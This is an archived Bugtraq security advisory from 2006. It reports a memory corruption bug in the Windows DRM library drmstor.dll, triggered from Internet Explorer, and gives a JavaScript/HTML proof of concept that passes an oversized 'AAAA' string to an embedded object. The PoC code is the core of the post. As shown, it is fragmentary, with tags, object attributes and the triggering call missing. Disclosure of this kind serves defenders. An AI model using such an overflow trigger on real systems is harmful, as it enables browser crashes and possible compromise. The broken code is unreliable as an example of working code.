Home page logo

bugtraq logo Bugtraq mailing list archives

MS Windows DRM software Memory Corruption
From: Joxean Koret <joxeankoret () yahoo es>
Date: Mon, 9 Oct 2006 12:39:24 +0200 (CEST)

Hi to all,

While finding buffer overflows in Internet Explorer I
found a memory corruption in the "drmstor.dll" library
which is a part of the DRM (Digital Rights Management)
software supplied with MS Windows.

The following Proof Of Concept is sufficient enough to
test the vulnerability:

function test()
var obj;
var x;

  x = "AAAA";

  for (i=0;i<=21;++i)
    x += x;

  obj = document.getElementById('testObj');
<body onload="test();">
<object id='testObj'

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.


Joxean Koret at <<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es

LLama Gratis a cualquier PC del Mundo. 
Llamadas a fijos y móviles desde 1 céntimo por minuto. 

  By Date           By Thread  

Current thread:
  • MS Windows DRM software Memory Corruption Joxean Koret (Oct 10)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]